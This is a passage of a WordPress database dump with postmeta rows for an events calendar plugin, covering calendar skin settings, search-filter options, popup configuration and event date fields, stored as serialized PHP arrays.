;s:1:\"0\";}s:10:\"event_cost\";a:1:{s:4:\"type\";s:1:\"0\";}s:12:\"month_filter\";a:1:{s:4:\"type\";s:1:\"0\";}s:11:\"time_filter\";a:1:{s:4:\"type\";s:1:\"0\";}s:11:\"text_search\";a:1:{s:4:\"type\";s:1:\"0\";}}s:13:\"full_calendar\";a:11:{s:8:\"category\";a:1:{s:4:\"type\";s:1:\"0\";}s:8:\"location\";a:1:{s:4:\"type\";s:1:\"0\";}s:9:\"organizer\";a:1:{s:4:\"type\";s:1:\"0\";}s:7:\"speaker\";a:1:{s:4:\"type\";s:1:\"0\";}s:3:\"tag\";a:1:{s:4:\"type\";s:1:\"0\";}s:5:\"label\";a:1:{s:4:\"type\";s:1:\"0\";}s:14:\"address_search\";a:1:{s:4:\"type\";s:1:\"0\";}s:10:\"event_cost\";a:1:{s:4:\"type\";s:1:\"0\";}s:12:\"month_filter\";a:1:{s:4:\"type\";s:8:\"dropdown\";}s:11:\"time_filter\";a:1:{s:4:\"type\";s:1:\"0\";}s:11:\"text_search\";a:1:{s:4:\"type\";s:10:\"text_input\";}}s:12:\"monthly_view\";a:11:{s:8:\"category\";a:1:{s:4:\"type\";s:1:\"0\";}s:8:\"location\";a:1:{s:4:\"type\";s:1:\"0\";}s:9:\"organizer\";a:1:{s:4:\"type\";s:1:\"0\";}s:7:\"speaker\";a:1:{s:4:\"type\";s:1:\"0\";}s:3:\"tag\";a:1:{s:4:\"type\";s:1:\"0\";}s:5:\"label\";a:1:{s:4:\"type\";s:1:\"0\";}s:14:\"address_search\";a:1:{s:4:\"type\";s:1:\"0\";}s:10:\"event_cost\";a:1:{s:4:\"type\";s:1:\"0\";}s:12:\"month_filter\";a:1:{s:4:\"type\";s:8:\"dropdown\";}s:11:\"time_filter\";a:1:{s:4:\"type\";s:1:\"0\";}s:11:\"text_search\";a:1:{s:4:\"type\";s:1:\"0\";}}s:11:\"yearly_view\";a:11:{s:8:\"category\";a:1:{s:4:\"type\";s:1:\"0\";}s:8:\"location\";a:1:{s:4:\"type\";s:1:\"0\";}s:9:\"organizer\";a:1:{s:4:\"type\";s:1:\"0\";}s:7:\"speaker\";a:1:{s:4:\"type\";s:1:\"0\";}s:3:\"tag\";a:1:{s:4:\"type\";s:1:\"0\";}s:5:\"label\";a:1:{s:4:\"type\";s:1:\"0\";}s:14:\"address_search\";a:1:{s:4:\"type\";s:1:\"0\";}s:10:\"event_cost\";a:1:{s:4:\"type\";s:1:\"0\";}s:12:\"month_filter\";a:1:{s:4:\"type\";s:1:\"0\";}s:11:\"time_filter\";a:1:{s:4:\"type\";s:1:\"0\";}s:11:\"text_search\";a:1:{s:4:\"type\";s:1:\"0\";}}s:3:\"map\";a:9:{s:8:\"category\";a:1:{s:4:\"type\";s:1:\"0\";}s:8:\"location\";a:1:{s:4:\"type\";s:1:\"0\";}s:9:\"organizer\";a:1:{s:4:\"type\";s:1:\"0\";}s:7:\"speaker\";a:1:{s:4:\"type\";s:1:\"0\";}s:3:\"tag\";a:1:{s:4:\"type\";s:1:\"0\";}s:5:\"label\";a:1:{s:4:\"type\";s:1:\"0\";}s:14:\"address_search\";a:1:{s:4:\"type\";s:1:\"0\";}s:10:\"event_cost\";a:1:{s:4:\"type\";s:1:\"0\";}s:11:\"text_search\";a:1:{s:4:\"type\";s:1:\"0\";}}s:10:\"daily_view\";a:11:{s:8:\"category\";a:1:{s:4:\"type\";s:1:\"0\";}s:8:\"location\";a:1:{s:4:\"type\";s:1:\"0\";}s:9:\"organizer\";a:1:{s:4:\"type\";s:1:\"0\";}s:7:\"speaker\";a:1:{s:4:\"type\";s:1:\"0\";}s:3:\"tag\";a:1:{s:4:\"type\";s:1:\"0\";}s:5:\"label\";a:1:{s:4:\"type\";s:1:\"0\";}s:14:\"address_search\";a:1:{s:4:\"type\";s:1:\"0\";}s:10:\"event_cost\";a:1:{s:4:\"type\";s:1:\"0\";}s:12:\"month_filter\";a:1:{s:4:\"type\";s:1:\"0\";}s:11:\"time_filter\";a:1:{s:4:\"type\";s:1:\"0\";}s:11:\"text_search\";a:1:{s:4:\"type\";s:1:\"0\";}}s:11:\"weekly_view\";a:11:{s:8:\"category\";a:1:{s:4:\"type\";s:1:\"0\";}s:8:\"location\";a:1:{s:4:\"type\";s:1:\"0\";}s:9:\"organizer\";a:1:{s:4:\"type\";s:1:\"0\";}s:7:\"speaker\";a:1:{s:4:\"type\";s:1:\"0\";}s:3:\"tag\";a:1:{s:4:\"type\";s:1:\"0\";}s:5:\"label\";a:1:{s:4:\"type\";s:1:\"0\";}s:14:\"address_search\";a:1:{s:4:\"type\";s:1:\"0\";}s:10:\"event_cost\";a:1:{s:4:\"type\";s:1:\"0\";}s:12:\"month_filter\";a:1:{s:4:\"type\";s:1:\"0\";}s:11:\"time_filter\";a:1:{s:4:\"type\";s:1:\"0\";}s:11:\"text_search\";a:1:{s:4:\"type\";s:1:\"0\";}}s:9:\"timetable\";a:11:{s:8:\"category\";a:1:{s:4:\"type\";s:1:\"0\";}s:8:\"location\";a:1:{s:4:\"type\";s:1:\"0\";}s:9:\"organizer\";a:1:{s:4:\"type\";s:1:\"0\";}s:7:\"speaker\";a:1:{s:4:\"type\";s:1:\"0\";}s:3:\"tag\";a:1:{s:4:\"type\";s:1:\"0\";}s:5:\"label\";a:1:{s:4:\"type\";s:1:\"0\";}s:14:\"address_search\";a:1:{s:4:\"type\";s:1:\"0\";}s:10:\"event_cost\";a:1:{s:4:\"type\";s:1:\"0\";}s:12:\"month_filter\";a:1:{s:4:\"type\";s:1:\"0\";}s:11:\"time_filter\";a:1:{s:4:\"type\";s:1:\"0\";}s:11:\"text_search\";a:1:{s:4:\"type\";s:1:\"0\";}}s:4:\"tile\";a:11:{s:8:\"category\";a:1:{s:4:\"type\";s:1:\"0\";}s:8:\"location\";a:1:{s:4:\"type\";s:1:\"0\";}s:9:\"organizer\";a:1:{s:4:\"type\";s:1:\"0\";}s:7:\"speaker\";a:1:{s:4:\"type\";s:1:\"0\";}s:3:\"tag\";a:1:{s:4:\"type\";s:1:\"0\";}s:5:\"label\";a:1:{s:4:\"type\";s:1:\"0\";}s:14:\"address_search\";a:1:{s:4:\"type\";s:1:\"0\";}s:10:\"event_cost\";a:1:{s:4:\"type\";s:1:\"0\";}s:12:\"month_filter\";a:1:{s:4:\"type\";s:1:\"0\";}s:11:\"time_filter\";a:1:{s:4:\"type\";s:1:\"0\";}s:11:\"text_search\";a:1:{s:4:\"type\";s:1:\"0\";}}}'),(136062,264229,'sf_status','1'),(136063,264230,'protect_children',''),(136064,264230,'label',''),(136065,264230,'category',''),(136066,264230,'location',''),(136067,264230,'organizer',''),(136068,264230,'tag',''),(136069,264230,'author',''),(136070,264230,'skin','monthly_view'),(136071,264230,'show_past_events','1'),(136072,264230,'sk-options','a:1:{s:12:\"monthly_view\";a:2:{s:15:\"start_date_type\";s:19:\"start_current_month\";s:20:\"next_previous_button\";i:1;}}'),(136073,264230,'sf-options','a:1:{s:12:\"monthly_view\";a:2:{s:8:\"category\";a:1:{s:4:\"type\";s:8:\"dropdown\";}s:11:\"text_search\";a:1:{s:4:\"type\";s:10:\"text_input\";}}}'),(136074,264230,'sf_status','1'),(136075,264231,'protect_children',''),(136076,264231,'label',''),(136077,264231,'category',''),(136078,264231,'location',''),(136079,264231,'organizer',''),(136080,264231,'tag',''),(136081,264231,'author',''),(136082,264231,'skin','weekly_view'),(136083,264231,'show_past_events','1'),(136084,264231,'sk-options','a:1:{s:11:\"weekly_view\";a:2:{s:15:\"start_date_type\";s:19:\"start_current_month\";s:20:\"next_previous_button\";i:1;}}'),(136085,264231,'sf-options','a:1:{s:11:\"weekly_view\";a:2:{s:8:\"category\";a:1:{s:4:\"type\";s:8:\"dropdown\";}s:11:\"text_search\";a:1:{s:4:\"type\";s:10:\"text_input\";}}}'),(136086,264231,'sf_status','1'),(136087,264232,'protect_children',''),(136088,264232,'label',''),(136089,264232,'category',''),(136090,264232,'location',''),(136091,264232,'organizer',''),(136092,264232,'tag',''),(136093,264232,'author',''),(136094,264232,'skin','daily_view'),(136095,264232,'show_past_events','1'),(136096,264232,'sk-options','a:1:{s:10:\"daily_view\";a:2:{s:15:\"start_date_type\";s:19:\"start_current_month\";s:20:\"next_previous_button\";i:1;}}'),(136097,264232,'sf-options','a:1:{s:10:\"daily_view\";a:2:{s:8:\"category\";a:1:{s:4:\"type\";s:8:\"dropdown\";}s:11:\"text_search\";a:1:{s:4:\"type\";s:10:\"text_input\";}}}'),(136098,264232,'sf_status','1'),(136099,264233,'protect_children',''),(136100,264233,'label',''),(136101,264233,'category',''),(136102,264233,'location',''),(136103,264233,'organizer',''),(136104,264233,'tag',''),(136105,264233,'author',''),(136106,264233,'skin','map'),(136107,264233,'show_past_events','1'),(136108,264233,'sk-options','a:1:{s:3:\"map\";a:1:{s:5:\"limit\";i:200;}}'),(136109,264233,'sf-options','a:1:{s:3:\"map\";a:2:{s:8:\"category\";a:1:{s:4:\"type\";s:8:\"dropdown\";}s:11:\"text_search\";a:1:{s:4:\"type\";s:10:\"text_input\";}}}'),(136110,264233,'sf_status','1'),(136111,264234,'protect_children',''),(136112,264234,'label',''),(136113,264234,'category',''),(136114,264234,'location',''),(136115,264234,'organizer',''),(136116,264234,'tag',''),(136117,264234,'author',''),(136118,264234,'skin','list'),(136119,264234,'show_past_events','0'),(136120,264234,'sk-options','a:1:{s:4:\"list\";a:1:{s:16:\"load_more_button\";i:1;}}'),(136121,264234,'sf-options','a:1:{s:4:\"list\";a:2:{s:8:\"category\";a:1:{s:4:\"type\";s:8:\"dropdown\";}s:11:\"text_search\";a:1:{s:4:\"type\";s:10:\"text_input\";}}}'),(136122,264234,'sf_status','1'),(136123,264235,'protect_children',''),(136124,264235,'label',''),(136125,264235,'category',''),(136126,264235,'location',''),(136127,264235,'organizer',''),(136128,264235,'tag',''),(136129,264235,'author',''),(136130,264235,'skin','grid'),(136131,264235,'show_past_events','0'),(136132,264235,'sk-options','a:1:{s:4:\"grid\";a:1:{s:16:\"load_more_button\";i:1;}}'),(136133,264235,'sf-options','a:1:{s:4:\"grid\";a:2:{s:8:\"category\";a:1:{s:4:\"type\";s:8:\"dropdown\";}s:11:\"text_search\";a:1:{s:4:\"type\";s:10:\"text_input\";}}}'),(136134,264235,'sf_status','1'),(136135,264236,'protect_children',''),(136136,264236,'label',''),(136137,264236,'category',''),(136138,264236,'location',''),(136139,264236,'organizer',''),(136140,264236,'tag',''),(136141,264236,'author',''),(136142,264236,'skin','carousel'),(136143,264236,'show_past_events','0'),(136144,264236,'sk-options','a:1:{s:8:\"carousel\";a:2:{s:5:\"count\";i:3;s:5:\"limit\";i:12;}}'),(136145,264236,'sf-options','a:1:{s:8:\"carousel\";a:2:{s:8:\"category\";a:1:{s:4:\"type\";s:8:\"dropdown\";}s:11:\"text_search\";a:1:{s:4:\"type\";s:10:\"text_input\";}}}'),(136146,264236,'sf_status','0'),(136147,264237,'protect_children',''),(136148,264237,'label',''),(136149,264237,'category',''),(136150,264237,'location',''),(136151,264237,'organizer',''),(136152,264237,'tag',''),(136153,264237,'author',''),(136154,264237,'skin','countdown'),(136155,264237,'show_past_events','0'),(136156,264237,'sk-options','a:1:{s:9:\"countdown\";a:2:{s:5:\"style\";s:6:\"style3\";s:8:\"event_id\";s:2:\"-1\";}}'),(136157,264237,'sf-options','a:1:{s:9:\"countdown\";a:2:{s:8:\"category\";a:1:{s:4:\"type\";s:8:\"dropdown\";}s:11:\"text_search\";a:1:{s:4:\"type\";s:10:\"text_input\";}}}'),(136158,264237,'sf_status','0'),(136159,264238,'protect_children',''),(136160,264238,'label',''),(136161,264238,'category',''),(136162,264238,'location',''),(136163,264238,'organizer',''),(136164,264238,'tag',''),(136165,264238,'author',''),(136166,264238,'skin','slider'),(136167,264238,'show_past_events','0'),(136168,264238,'sk-options','a:1:{s:6:\"slider\";a:3:{s:5:\"style\";s:2:\"t1\";s:5:\"limit\";i:6;s:8:\"autoplay\";i:3000;}}'),(136169,264238,'sf-options','a:1:{s:6:\"slider\";a:2:{s:8:\"category\";a:1:{s:4:\"type\";s:8:\"dropdown\";}s:11:\"text_search\";a:1:{s:4:\"type\";s:10:\"text_input\";}}}'),(136170,264238,'sf_status','0'),(136171,264239,'protect_children',''),(136172,264239,'label',''),(136173,264239,'category',''),(136174,264239,'location',''),(136175,264239,'organizer',''),(136176,264239,'tag',''),(136177,264239,'author',''),(136178,264239,'skin','masonry'),(136179,264239,'show_past_events','0'),(136180,264239,'sk-options','a:1:{s:7:\"masonry\";a:2:{s:5:\"limit\";i:24;s:9:\"filter_by\";s:8:\"category\";}}'),(136181,264239,'sf-options','a:1:{s:7:\"masonry\";a:2:{s:8:\"category\";a:1:{s:4:\"type\";s:8:\"dropdown\";}s:11:\"text_search\";a:1:{s:4:\"type\";s:10:\"text_input\";}}}'),(136182,264239,'sf_status','0'),(136183,264240,'protect_children',''),(136184,264240,'label',''),(136185,264240,'category',''),(136186,264240,'location',''),(136187,264240,'organizer',''),(136188,264240,'tag',''),(136189,264240,'author',''),(136190,264240,'skin','agenda'),(136191,264240,'show_past_events','0'),(136192,264240,'sk-options','a:1:{s:6:\"agenda\";a:1:{s:16:\"load_more_button\";i:1;}}'),(136193,264240,'sf-options','a:1:{s:6:\"agenda\";a:2:{s:8:\"category\";a:1:{s:4:\"type\";s:8:\"dropdown\";}s:11:\"text_search\";a:1:{s:4:\"type\";s:10:\"text_input\";}}}'),(136194,264240,'sf_status','1'),(136195,264241,'protect_children',''),(136196,264241,'label',''),(136197,264241,'category',''),(136198,264241,'location',''),(136199,264241,'organizer',''),(136200,264241,'tag',''),(136201,264241,'author',''),(136202,264241,'skin','timetable'),(136203,264241,'show_past_events','0'),(136204,264241,'sk-options','a:1:{s:9:\"timetable\";a:1:{s:20:\"next_previous_button\";i:1;}}'),(136205,264241,'sf-options','a:1:{s:9:\"timetable\";a:2:{s:8:\"category\";a:1:{s:4:\"type\";s:8:\"dropdown\";}s:11:\"text_search\";a:1:{s:4:\"type\";s:10:\"text_input\";}}}'),(136206,264241,'sf_status','1'),(136207,264242,'protect_children',''),(136208,264242,'label',''),(136209,264242,'category',''),(136210,264242,'location',''),(136211,264242,'organizer',''),(136212,264242,'tag',''),(136213,264242,'author',''),(136214,264242,'skin','tile'),(136215,264242,'show_past_events','0'),(136216,264242,'sk-options','a:1:{s:4:\"tile\";a:1:{s:20:\"next_previous_button\";i:1;}}'),(136217,264242,'sf-options','a:1:{s:4:\"tile\";a:2:{s:8:\"category\";a:1:{s:4:\"type\";s:8:\"dropdown\";}s:11:\"text_search\";a:1:{s:4:\"type\";s:10:\"text_input\";}}}'),(136218,264242,'sf_status','1'),(136219,264243,'protect_children',''),(136220,264243,'label',''),(136221,264243,'category',''),(136222,264243,'location',''),(136223,264243,'organizer',''),(136224,264243,'tag',''),(136225,264243,'author',''),(136226,264243,'skin','timeline'),(136227,264243,'show_past_events','0'),(136228,264243,'sk-options','a:1:{s:8:\"timeline\";a:1:{s:16:\"load_more_button\";i:1;}}'),(136229,264243,'sf-options','a:1:{s:8:\"timeline\";a:2:{s:8:\"category\";a:1:{s:4:\"type\";s:8:\"dropdown\";}s:11:\"text_search\";a:1:{s:4:\"type\";s:10:\"text_input\";}}}'),(136230,264243,'sf_status','0'),(136231,264229,'_edit_lock','1616618030:2'),(136232,264229,'_edit_last','2'),(136233,264229,'sf_display_label','0'),(136234,264229,'show_only_one_occurrence','0'),(136235,264229,'show_only_past_events','0'),(136236,264229,'show_ongoing_events','0'),(136237,264229,'show_only_ongoing_events','0'),(192809,269146,'one_occurrence','0'),(192808,269146,'mec_allday','0'),(143434,265127,'_seq_num','72'),(143433,265127,'_form_id','13'),(136328,264255,'_edit_last','2'),(136329,264255,'boldgrid_hide_page_title','0'),(136330,264255,'popup_title',''),(136331,264255,'popup_settings','a:44:{s:8:\"theme_id\";s:6:\"132183\";s:4:\"size\";s:6:\"medium\";s:20:\"responsive_min_width\";s:2:\"0%\";s:20:\"responsive_max_width\";s:4:\"100%\";s:12:\"custom_width\";s:5:\"640px\";s:13:\"custom_height\";s:5:\"380px\";s:14:\"animation_type\";s:4:\"fade\";s:15:\"animation_speed\";s:3:\"350\";s:16:\"animation_origin\";s:10:\"center top\";s:10:\"open_sound\";s:4:\"none\";s:12:\"custom_sound\";s:0:\"\";s:8:\"location\";s:10:\"center top\";s:12:\"position_top\";s:3:\"100\";s:15:\"position_bottom\";s:1:\"0\";s:13:\"position_left\";s:1:\"0\";s:14:\"position_right\";s:1:\"0\";s:6:\"zindex\";s:10:\"1999999999\";s:10:\"close_text\";s:0:\"\";s:18:\"close_button_delay\";s:1:\"0\";s:30:\"close_on_form_submission_delay\";s:1:\"0\";s:10:\"conditions\";a:0:{}s:8:\"triggers\";a:0:{}s:7:\"cookies\";a:0:{}s:17:\"disable_on_mobile\";b:0;s:17:\"disable_on_tablet\";b:0;s:18:\"custom_height_auto\";b:0;s:18:\"scrollable_content\";b:0;s:21:\"position_from_trigger\";b:0;s:14:\"position_fixed\";b:0;s:16:\"overlay_disabled\";b:0;s:9:\"stackable\";b:0;s:18:\"disable_reposition\";b:0;s:24:\"close_on_form_submission\";b:0;s:22:\"close_on_overlay_click\";b:0;s:18:\"close_on_esc_press\";b:0;s:17:\"close_on_f4_press\";b:0;s:19:\"disable_form_reopen\";b:0;s:21:\"disable_accessibility\";b:0;s:10:\"separator1\";N;s:13:\"atc_promotion\";N;s:7:\"explain\";N;s:12:\"type_section\";N;s:12:\"fi_promotion\";N;s:10:\"theme_slug\";s:13:\"default-theme\";}'),(136332,264255,'enabled','1'),(136350,161672,'protect_children',''),(136349,264255,'popup_last_opened','1617109819'),(136348,264255,'popup_open_count_total','24'),(136519,151053,'sg_popup_target_custom','a:1:{i:0;s:6:\"264285\";}'),(136508,151053,'passster_activate_global_protection',NULL),(136509,151053,'passster_activate_protection',NULL),(136510,151053,'passster_protection_type','password'),(143203,265105,'mec_allday','0'),(143202,265105,'mec_certain_weekdays','a:0:{}'),(143201,265105,'mec_repeat','a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}'),(136593,7160,'passster_activate_global_protection',''),(136594,264293,'protect_children',''),(136595,264293,'_tribe_modified_fields','a:32:{s:16:\"protect_children\";i:1617202404;s:12:\"_EventOrigin\";i:1617202404;s:13:\"_thumbnail_id\";i:1617203385;s:24:\"boldgrid_hide_page_title\";i:1617202404;s:17:\"_EventShowMapLink\";i:1617202404;s:13:\"_EventShowMap\";i:1617202404;s:15:\"_EventStartDate\";i:1617203385;s:13:\"_EventEndDate\";i:1617203385;s:18:\"_EventStartDateUTC\";i:1617203385;s:16:\"_EventEndDateUTC\";i:1617203385;s:14:\"_EventDuration\";i:1617202404;s:20:\"_EventCurrencySymbol\";i:1617202404;s:22:\"_EventCurrencyPosition\";i:1617202404;s:10:\"_EventCost\";i:1617202404;s:9:\"_EventURL\";i:1617202404;s:14:\"_EventTimezone\";i:1617202404;s:18:\"_EventTimezoneAbbr\";i:1617203385;s:27:\"_EventNextPendingRecurrence\";i:1617202404;s:26:\"_RTECregistrationsDisabled\";i:1617202404;s:17:\"_RTECdeadlineType\";i:1617202404;s:19:\"_RTECwhoCanRegister\";i:1617202404;s:23:\"_RTEClimitRegistrations\";i:1617202404;s:21:\"_RTECmaxRegistrations\";i:1617202404;s:16:\"_EventRecurrence\";i:1617202404;s:18:\"_RTECnumRegistered\";i:1617202404;s:13:\"_EventVenueID\";i:1617202404;s:12:\"_dp_original\";i:1617202404;s:10:\"_edit_last\";i:1617202431;s:12:\"post_content\";i:1617204611;s:10:\"post_title\";i:1617203634;s:16:\"tribe_events_cat\";i:1617226211;s:11:\"post_status\";i:1617203385;}'),(136596,264293,'_EventOrigin','events-calendar'),(136597,264293,'protect_children',''),(136598,264293,'protect_children',''),(136599,264293,'protect_children',''),(136600,264293,'protect_children',''),(136601,264293,'protect_children',''),(136602,264293,'protect_children',''),(136603,264293,'protect_children',''),(136604,264293,'protect_children',''),(136605,264293,'protect_children',''),(136606,264293,'_tribe_modified_fields','a:32:{s:16:\"protect_children\";i:1617202404;s:12:\"_EventOrigin\";i:1617202404;s:13:\"_thumbnail_id\";i:1617203385;s:24:\"boldgrid_hide_page_title\";i:1617202404;s:17:\"_EventShowMapLink\";i:1617202404;s:13:\"_EventShowMap\";i:1617202404;s:15:\"_EventStartDate\";i:1617203385;s:13:\"_EventEndDate\";i:1617203385;s:18:\"_EventStartDateUTC\";i:1617203385;s:16:\"_EventEndDateUTC\";i:1617203385;s:14:\"_EventDuration\";i:1617202404;s:20:\"_EventCurrencySymbol\";i:1617202404;s:22:\"_EventCurrencyPosition\";i:1617202404;s:10:\"_EventCost\";i:1617202404;s:9:\"_EventURL\";i:1617202404;s:14:\"_EventTimezone\";i:1617202404;s:18:\"_EventTimezoneAbbr\";i:1617203385;s:27:\"_EventNextPendingRecurrence\";i:1617202404;s:26:\"_RTECregistrationsDisabled\";i:1617202404;s:17:\"_RTECdeadlineType\";i:1617202404;s:19:\"_RTECwhoCanRegister\";i:1617202404;s:23:\"_RTEClimitRegistrations\";i:1617202404;s:21:\"_RTECmaxRegistrations\";i:1617202404;s:16:\"_EventRecurrence\";i:1617202404;s:18:\"_RTECnumRegistered\";i:1617202404;s:13:\"_EventVenueID\";i:1617202404;s:12:\"_dp_original\";i:1617202404;s:10:\"_edit_last\";i:1617202431;s:12:\"post_content\";i:1617204611;s:10:\"post_title\";i:1617203634;s:16:\"tribe_events_cat\";i:1617226211;s:11:\"post_status\";i:1617203385;}'),(136638,264293,'_EventCurrencyPosition','prefix'),(136607,264293,'_tribe_modified_fields','a:32:{s:16:\"protect_children\";i:1617202404;s:12:\"_EventOrigin\";i:1617202404;s:13:\"_thumbnail_id\";i:1617203385;s:24:\"boldgrid_hide_page_title\";i:1617202404;s:17:\"_EventShowMapLink\";i:1617202404;s:13:\"_EventShowMap\";i:1617202404;s:15:\"_EventStartDate\";i:1617203385;s:13:\"_EventEndDate\";i:1617203385;s:18:\"_EventStartDateUTC\";i:1617203385;s:16:\"_EventEndDateUTC\";i:1617203385;s:14:\"_EventDuration\";i:1617202404;s:20:\"_EventCurrencySymbol\";i:1617202404;s:22:\"_EventCurrencyPosition\";i:1617202404;s:10:\"_EventCost\";i:1617202404;s:9:\"_EventURL\";i:1617202404;s:14:\"_EventTimezone\";i:1617202404;s:18:\"_EventTimezoneAbbr\";i:1617203385;s:27:\"_EventNextPendingRecurrence\";i:1617202404;s:26:\"_RTECregistrationsDisabled\";i:1617202404;s:17:\"_RTECdeadlineType\";i:1617202404;s:19:\"_RTECwhoCanRegister\";i:1617202404;s:23:\"_RTEClimitRegistrations\";i:1617202404;s:21:\"_RTECmaxRegistrations\";i:1617202404;s:16:\"_EventRecurrence\";i:1617202404;s:18:\"_RTECnumRegistered\";i:1617202404;s:13:\"_EventVenueID\";i:1617202404;s:12:\"_dp_original\";i:1617202404;s:10:\"_edit_last\";i:1617202431;s:12:\"post_content\";i:1617204611;s:10:\"post_title\";i:1617203634;s:16:\"tribe_events_cat\";i:1617226211;s:11:\"post_status\";i:1617203385;}'),(136637,264293,'_EventCurrencySymbol',''),(136608,264293,'_tribe_modified_fields','a:32:{s:16:\"protect_children\";i:1617202404;s:12:\"_EventOrigin\";i:1617202404;s:13:\"_thumbnail_id\";i:1617203385;s:24:\"boldgrid_hide_page_title\";i:1617202404;s:17:\"_EventShowMapLink\";i:1617202404;s:13:\"_EventShowMap\";i:1617202404;s:15:\"_EventStartDate\";i:1617203385;s:13:\"_EventEndDate\";i:1617203385;s:18:\"_EventStartDateUTC\";i:1617203385;s:16:\"_EventEndDateUTC\";i:1617203385;s:14:\"_EventDuration\";i:1617202404;s:20:\"_EventCurrencySymbol\";i:1617202404;s:22:\"_EventCurrencyPosition\";i:1617202404;s:10:\"_EventCost\";i:1617202404;s:9:\"_EventURL\";i:1617202404;s:14:\"_EventTimezone\";i:1617202404;s:18:\"_EventTimezoneAbbr\";i:1617203385;s:27:\"_EventNextPendingRecurrence\";i:1617202404;s:26:\"_RTECregistrationsDisabled\";i:1617202404;s:17:\"_RTECdeadlineType\";i:1617202404;s:19:\"_RTECwhoCanRegister\";i:1617202404;s:23:\"_RTEClimitRegistrations\";i:1617202404;s:21:\"_RTECmaxRegistrations\";i:1617202404;s:16:\"_EventRecurrence\";i:1617202404;s:18:\"_RTECnumRegistered\";i:1617202404;s:13:\"_EventVenueID\";i:1617202404;s:12:\"_dp_original\";i:1617202404;s:10:\"_edit_last\";i:1617202431;s:12:\"post_content\";i:1617204611;s:10:\"post_title\";i:1617203634;s:16:\"tribe_events_cat\";i:1617226211;s:11:\"post_status\";i:1617203385;}'),(136636,264293,'_EventDuration','3600'),(136639,264293,'_EventCost',''),(136609,264293,'_tribe_modified_fields','a:32:{s:16:\"protect_children\";i:1617202404;s:12:\"_EventOrigin\";i:1617202404;s:13:\"_thumbnail_id\";i:1617203385;s:24:\"boldgrid_hide_page_title\";i:1617202404;s:17:\"_EventShowMapLink\";i:1617202404;s:13:\"_EventShowMap\";i:1617202404;s:15:\"_EventStartDate\";i:1617203385;s:13:\"_EventEndDate\";i:1617203385;s:18:\"_EventStartDateUTC\";i:1617203385;s:16:\"_EventEndDateUTC\";i:1617203385;s:14:\"_EventDuration\";i:1617202404;s:20:\"_EventCurrencySymbol\";i:1617202404;s:22:\"_EventCurrencyPosition\";i:1617202404;s:10:\"_EventCost\";i:1617202404;s:9:\"_EventURL\";i:1617202404;s:14:\"_EventTimezone\";i:1617202404;s:18:\"_EventTimezoneAbbr\";i:1617203385;s:27:\"_EventNextPendingRecurrence\";i:1617202404;s:26:\"_RTECregistrationsDisabled\";i:1617202404;s:17:\"_RTECdeadlineType\";i:1617202404;s:19:\"_RTECwhoCanRegister\";i:1617202404;s:23:\"_RTEClimitRegistrations\";i:1617202404;s:21:\"_RTECmaxRegistrations\";i:1617202404;s:16:\"_EventRecurrence\";i:1617202404;s:18:\"_RTECnumRegistered\";i:1617202404;s:13:\"_EventVenueID\";i:1617202404;s:12:\"_dp_original\";i:1617202404;s:10:\"_edit_last\";i:1617202431;s:12:\"post_content\";i:1617204611;s:10:\"post_title\";i:1617203634;s:16:\"tribe_events_cat\";i:1617226211;s:11:\"post_status\";i:1617203385;}'),(136635,264293,'_EventEndDateUTC','2021-04-27 02:00:00'),(136610,264293,'_tribe_modified_fields','a:32:{s:16:\"protect_children\";i:1617202404;s:12:\"_EventOrigin\";i:1617202404;s:13:\"_thumbnail_id\";i:1617203385;s:24:\"boldgrid_hide_page_title\";i:1617202404;s:17:\"_EventShowMapLink\";i:1617202404;s:13:\"_EventShowMap\";i:1617202404;s:15:\"_EventStartDate\";i:1617203385;s:13:\"_EventEndDate\";i:1617203385;s:18:\"_EventStartDateUTC\";i:1617203385;s:16:\"_EventEndDateUTC\";i:1617203385;s:14:\"_EventDuration\";i:1617202404;s:20:\"_EventCurrencySymbol\";i:1617202404;s:22:\"_EventCurrencyPosition\";i:1617202404;s:10:\"_EventCost\";i:1617202404;s:9:\"_EventURL\";i:1617202404;s:14:\"_EventTimezone\";i:1617202404;s:18:\"_EventTimezoneAbbr\";i:1617203385;s:27:\"_EventNextPendingRecurrence\";i:1617202404;s:26:\"_RTECregistrationsDisabled\";i:1617202404;s:17:\"_RTECdeadlineType\";i:1617202404;s:19:\"_RTECwhoCanRegister\";i:1617202404;s:23:\"_RTEClimitRegistrations\";i:1617202404;s:21:\"_RTECmaxRegistrations\";i:1617202404;s:16:\"_EventRecurrence\";i:1617202404;s:18:\"_RTECnumRegistered\";i:1617202404;s:13:\"_EventVenueID\";i:1617202404;s:12:\"_dp_original\";i:1617202404;s:10:\"_edit_last\";i:1617202431;s:12:\"post_content\";i:1617204611;s:10:\"post_title\";i:1617203634;s:16:\"tribe_events_cat\";i:1617226211;s:11:\"post_status\";i:1617203385;}'),(136634,264293,'_EventStartDateUTC','2021-04-27 01:00:00'),(136640,264293,'_EventURL',''),(136611,264293,'_tribe_modified_fields','a:32:{s:16:\"protect_children\";i:1617202404;s:12:\"_EventOrigin\";i:1617202404;s:13:\"_thumbnail_id\";i:1617203385;s:24:\"boldgrid_hide_page_title\";i:1617202404;s:17:\"_EventShowMapLink\";i:1617202404;s:13:\"_EventShowMap\";i:1617202404;s:15:\"_EventStartDate\";i:1617203385;s:13:\"_EventEndDate\";i:1617203385;s:18:\"_EventStartDateUTC\";i:1617203385;s:16:\"_EventEndDateUTC\";i:1617203385;s:14:\"_EventDuration\";i:1617202404;s:20:\"_EventCurrencySymbol\";i:1617202404;s:22:\"_EventCurrencyPosition\";i:1617202404;s:10:\"_EventCost\";i:1617202404;s:9:\"_EventURL\";i:1617202404;s:14:\"_EventTimezone\";i:1617202404;s:18:\"_EventTimezoneAbbr\";i:1617203385;s:27:\"_EventNextPendingRecurrence\";i:1617202404;s:26:\"_RTECregistrationsDisabled\";i:1617202404;s:17:\"_RTECdeadlineType\";i:1617202404;s:19:\"_RTECwhoCanRegister\";i:1617202404;s:23:\"_RTEClimitRegistrations\";i:1617202404;s:21:\"_RTECmaxRegistrations\";i:1617202404;s:16:\"_EventRecurrence\";i:1617202404;s:18:\"_RTECnumRegistered\";i:1617202404;s:13:\"_EventVenueID\";i:1617202404;s:12:\"_dp_original\";i:1617202404;s:10:\"_edit_last\";i:1617202431;s:12:\"post_content\";i:1617204611;s:10:\"post_title\";i:1617203634;s:16:\"tribe_events_cat\";i:1617226211;s:11:\"post_status\";i:1617203385;}'),(136633,264293,'_E